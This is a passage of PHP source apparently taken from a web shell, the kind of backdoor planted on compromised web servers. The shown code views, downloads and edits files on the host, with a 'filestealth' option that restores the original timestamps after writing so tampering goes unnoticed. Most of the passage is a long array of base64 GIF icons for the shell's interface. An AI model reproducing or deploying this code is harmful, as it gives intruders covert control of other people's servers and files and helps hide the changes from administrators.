elseif ($ft == "notepad") { | |
@ob_clean(); | |
header("Content-type: text/plain"); | |
header("Content-disposition: attachment; filename=\"".$f.".txt\";"); | |
echo($r); | |
exit; | |
} | |
elseif ($ft == "img") { | |
$inf = getimagesize($d.$f); | |
if (!$white) { | |
if (empty($imgsize)) {$imgsize = 20;} | |
$width = $inf[0]/100*$imgsize; | |
$height = $inf[1]/100*$imgsize; | |
echo "<center><b>Size:</b> "; | |
$sizes = array("100","50","20"); | |
foreach ($sizes as $v) { | |
echo "<a href=\"".$surl."x=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; | |
if ($imgsize != $v ) {echo $v;} | |
else {echo "<u>".$v."</u>";} | |
echo "</a> "; | |
} | |
echo "<br><br><img src=\"".$surl."x=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; | |
} | |
else { | |
@ob_clean(); | |
$ext = explode($f,"."); | |
$ext = $ext[count($ext)-1]; | |
header("Content-type: ".$inf["mime"]); | |
readfile($d.$f); | |
exit; | |
} | |
} | |
elseif ($ft == "edit") { | |
if (!empty($submit)) | |
{ | |
if ($filestealth) {$stat = stat($d.$f);} | |
$fp = fopen($d.$f,"w"); | |
if (!$fp) {echo "<b>Can't write to file!</b>";} | |
else | |
{ | |
echo "<b>Saved!</b>"; | |
fwrite($fp,$edit_text); | |
fclose($fp); | |
if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} | |
$r = $edit_text; | |
} | |
} | |
$rows = count(explode("\r\n",$r)); | |
if ($rows < 10) {$rows = 10;} | |
if ($rows > 30) {$rows = 30;} | |
echo "<form action=\"".$surl."x=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href='".addslashes($surl."x=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; | |
} | |
elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} | |
else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} | |
} | |
echo "</div>\n"; | |
} | |
} | |
else { | |
@ob_clean(); | |
$images = array( | |
"arrow_ltr"=> | |
"R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", | |
"back"=> | |
"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". | |
"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". | |
"Wg0JADs=", | |
"buffer"=> | |
"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". | |
"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". | |
"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", | |
"change"=> | |
"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". | |
"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". | |
"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". | |
"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". | |
"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". | |
"zMshADs=", | |
"delete"=> | |
"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". | |
"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". | |
"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". | |
"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". | |
"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". | |
"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". | |
"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". | |
"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". | |
"jwVFHBgiEGQFIgQasYkcSbJQIAA7", | |
"download"=> | |
"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". | |
"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", | |
"forward"=> | |
"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". | |
"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". | |
"WqsJADs=", | |
"home"=> | |
"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". | |
"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". | |
"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". | |
"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", | |
"mode"=> | |
"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". | |
"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". | |
"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", | |
"search"=> | |
"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". | |
"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". | |
"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". | |
"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". | |
"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", | |
"setup"=> | |
"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". | |
"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". | |
"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". | |
"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". | |
"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", | |
"small_dir"=> | |
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". | |
"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", | |
"small_unk"=> | |
"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". | |
"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". | |
"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". | |
"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". | |
"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". | |
"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". | |
"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". | |
"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". | |
"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". | |
"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". | |
"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". | |
"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". | |
"yAsokBkQADs=", | |
"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". | |
"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", | |
"sort_asc"=> | |
"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". | |
"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", | |
"sort_desc"=> | |
"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". | |
"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", | |
"sql_button_drop"=> | |
"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". | |
"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". | |
"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". | |
"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". | |
"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". | |
"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". | |
"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". | |
"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". | |
"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". | |
"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". | |
"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". | |
"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". | |
"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". | |
"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". | |
"AQEAOw==", | |
"sql_button_empty"=> | |
"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". | |
"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". | |
"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". | |
"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". | |
"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". | |
"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". | |
"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". | |
"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". | |
"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". | |
"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". | |
"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". | |
"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". | |
"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". | |
"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", | |
"sql_button_insert"=> | |
"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". | |
"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". | |
"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". | |
"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". | |
"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". | |
"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". | |
"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". | |
"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". | |
"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". | |
"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". | |
"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". | |
"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". | |
"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". | |
"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", | |
"up"=> | |
"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". | |
"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". | |
"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". | |
"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", | |
"write"=> | |
"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". | |
"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". | |
"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". | |
"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", | |
"ext_asp"=> | |
"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". | |
"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". | |
"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", | |
"ext_mp3"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". | |
"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". | |
"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", | |
"ext_avi"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". | |
"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". | |
"PYXCyg+V2i44XeRmSfYqsGhAAgA7", | |
"ext_cgi"=> | |
"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". | |
"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". | |
"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". | |
"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". | |
"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". | |
"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". | |
"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". | |
"RYtMAgEAOw==", | |
"ext_cmd"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". | |
"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". | |
"dmrYAMn1onq/YKpjvEgAADs=", | |
"ext_cpp"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". | |
"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". | |
"Eq7YrLDE7a4SADs=", | |
"ext_ini"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". | |
"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". | |
"SnEjgPVarHEHgrB43JvszsQEADs=", | |
"ext_diz"=> | |
"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". | |
"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". | |
"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". | |
"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". | |
"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". | |
"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". | |
"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". | |
"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". | |
"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". | |
"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". | |
"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". | |
"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". | |
"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". | |
"Ow==", | |
"ext_doc"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". | |
"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". | |
"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", | |
"ext_exe"=> | |
"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". | |
"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". | |
"xhIAOw==", | |
"ext_h"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". | |
"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". | |
"Wq/NknbbSgAAOw==", | |
"ext_hpp"=> | |
"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". | |
"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". | |
"UqUagnbLdZa+YFcCADs=", | |
"ext_htaccess"=> | |
